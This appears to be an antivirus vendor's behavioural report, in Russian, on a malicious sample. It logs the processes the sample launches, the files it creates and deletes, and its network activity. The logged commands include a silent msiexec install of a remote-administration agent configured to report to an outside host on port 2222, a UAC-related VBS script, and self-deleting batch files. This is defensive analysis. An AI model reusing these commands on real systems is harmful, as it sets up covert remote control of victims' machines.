Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '<SYSTEM32>\wscript.exe' "%TEMP%\uacinstall.vbs"
Запускает на исполнение:
- '<SYSTEM32>\msiexec.exe' /qr /i %TEMP%\Agent_x86.msi /quiet /qn /norestart /l*v %TEMP%\ra-agent-install.log ALLUSERS=1 REBOOT=ReallySuppress P_CONNECTION_CHOSEN=Host P_HOSTNAME="era.viptsg.com" P_PORT="2222" P_CERT_PAT...
- '<SYSTEM32>\msiexec.exe' /V
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\selfdel0.bat" "
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\batfile.bat" "
- '<SYSTEM32>\cmd.exe' /c ver
- '<SYSTEM32>\cmd.exe' /c echo Version 5.1.2600
Изменения в файловой системе:
Создает следующие файлы:
- %TEMP%\1.tmp\batfile.bat
Удаляет следующие файлы:
- %TEMP%\1.tmp\batfile.bat
- %TEMP%\uacinstall.vbs
Самоудаляется.
Сетевая активность:
Подключается к:
- 're####tory.eset.com':80
TCP:
Запросы HTTP GET:
- http://re####tory.eset.com/v1/com/eset/apps/business/era/agent/v6/6.3.136.0/Agent_x86.msi
UDP:
- DNS ASK re####tory.eset.com
